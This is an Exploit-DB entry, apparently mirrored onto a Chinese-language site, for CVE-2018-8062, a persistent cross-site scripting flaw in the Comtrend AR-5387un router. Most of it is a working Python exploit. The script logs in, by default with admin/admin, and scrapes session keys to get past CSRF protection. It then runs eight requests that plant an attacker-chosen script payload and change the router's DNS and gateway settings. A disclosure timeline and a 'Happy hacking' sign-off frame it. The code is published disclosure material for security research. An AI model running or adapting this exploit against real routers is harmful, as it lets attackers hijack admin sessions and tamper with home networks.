Comtrend AR-5387un router – Persistent XSS (Authenticated)

Exploit Database
111 阅读

作者： OscarAkaElvis

日期： 2020-10-20
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/48908/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

#!/usr/bin/env python3

# -*- coding: utf-8 -*-

"""

Exploit Title: Persistent XSS on Comtrend AR-5387un router

Date: 19/10/2020

Exploit Author: OscarAkaElvis

Vendor Homepage: https://www.comtrend.com/

Version: Comtrend AR-5387un router

Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i

CVE: CVE-2018-8062

Disclosure timeline:

08/03/2018: Vulnerability was discovered

10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)

11/03/2018: Mitre answered, CVE number reserved

11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered

16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)

18/10/2020: Exploit creation

19/10/2020: Exploit sent to exploit-db

Exploitation explanation:

To exploit this vulnerability, once logged into the router, a WAN service must be created

Click on "Advanced Setup", "WAN Service". "Add button", "Next"

Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script>

Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"

The result of the XSS will be displayed and triggered on the WAN services page

This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload

Happy hacking :)

OscarAkaElvis - https://twitter.com/OscarAkaElvis

"""

# Dependencies and libraries

import requests

from requests.auth import HTTPBasicAuth

import re

from sys import argv, exit

import argparse

from os import path

from time import sleep

class Exploit(object):

# Global class vars

session = requests.Session()

user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"

ip = None

username = None

password = None

payload = None

default_ip = "192.168.1.1"

default_username = "admin"

default_password = "admin"

default_payload = "<script>alert('xss');</script>"

exploit_version = "1.0"

current_sessionkey = None

referer_sessionkey = None

script_name = path.basename(argv[0])

description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'

epilog_text = 'Examples:\npython3 ' + script_name + ' -i 192.168.0.150\npython3 ' + script_name + ' -u admin -p mySecureRouterP@ss\npython3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\''

def start_msg(self):

print("[*] Starting CVE-2018-8062 exploit...")

sleep(0.5)

def check_params(self, arguments):

parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)

parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')

parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')

parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')

parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')

parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")

args = parser.parse_args(arguments)

self.start_msg()

print("[*] Launch the exploit using -h argument to check all the available options")

print()

if not args.ip:

self.ip = self.default_ip

print("[!] Warning, no ip set, default will be used: " + str(self.ip))

else:

self.ip = args.ip

if not args.username:

self.username = self.default_username

print("[!] Warning, no username set, default will be used: " + str(self.username))

else:

self.username = args.username

if not args.password:

self.password = self.default_password

print("[!] Warning, no password set, default will be used: " + str(self.password))

else:

self.password = args.password

if not args.payload:

self.payload = self.default_payload

print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))

else:

self.password = args.password

def print_version(self):

print()

return 'v{}'.format(self.exploit_version)

def check_router(self):

try:

print()

print("[*] Trying to detect router...")

headers = {"User-Agent": self.user_agent}

response = self.session.get("http://" + str(self.ip) + "/", headers=headers)

if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):

print("[+] Comtrend router detected successfully")

else:

print()

print("[-] It seems the target is not a Comtrend router")

print("[*] Exiting...")

exit(1)

except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):

print()

print("[-] Can't connect to the router")

print("[*] Exiting...")

exit(1)

def check_login(self):

print()

print("[*] Trying to login...")

headers = {"User-Agent": self.user_agent}

response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))

if response.status_code != 401:

print("[+] Login successfully!")

sleep(1)

else:

print()

print("[-] Can't login into the router. Check your creds!")

print("[*] Exiting...")

exit(1)

def get_sessionKey(self, response_text):

sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))

if sessionKey is not None:

sessionKey = sessionKey.group(1)

else:

sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)

if sessionKey is not None:

sessionKey = sessionKey.group(1)

return sessionKey

def step1(self):

print()

print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")

headers = {"User-Agent": self.user_agent}

response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.current_sessionkey = self.get_sessionKey(response.content)

print("[+] Success! Initial sessionKey: " + self.current_sessionkey)

sleep(1)

def step2(self):

print()

print("[*] Performing step 2/8...")

paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}

response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.referer_sessionkey = self.current_sessionkey

self.current_sessionkey = self.get_sessionKey(response.content)

sleep(1)

def step3(self):

print()

print("[*] Performing step 3/8...")

paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}

response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.referer_sessionkey = self.current_sessionkey

self.current_sessionkey = self.get_sessionKey(response.content)

sleep(1)

def step4(self):

print()

print("[*] Performing step 4/8...")

paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}

response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.referer_sessionkey = self.current_sessionkey

self.current_sessionkey = self.get_sessionKey(response.content)

sleep(1)

def step5(self):

print()

print("[*] Performing step 5/8...")

paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}

response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.referer_sessionkey = self.current_sessionkey

self.current_sessionkey = self.get_sessionKey(response.content)

sleep(1)

def step6(self):

print()

print("[*] Performing step 6/8...")

paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}

response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.referer_sessionkey = self.current_sessionkey

self.current_sessionkey = self.get_sessionKey(response.content)

sleep(1)

def step7(self):

print()

print("[*] Performing step 7/8...")

paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}

response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

self.referer_sessionkey = self.current_sessionkey

self.current_sessionkey = self.get_sessionKey(response.content)

sleep(1)

def final_step8(self):

print()

print("[*] Performing final step 8/8. Deploying XSS payload...")

paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}

headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}

self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))

print()

print("[+] XSS payload deployed successfully")

print("[+] Happy hacking :) . Author: OscarAkaElvis")

@staticmethod

def main(self, arguments):

self.check_params(arguments)

self.check_router()

self.check_login()

self.step1()

self.step2()

self.step3()

self.step4()

self.step5()

self.step6()

self.step7()

self.final_step8()

exit(0)

if __name__ == '__main__':

ImportObject = Exploit()

ImportObject.main(ImportObject, argv[1:])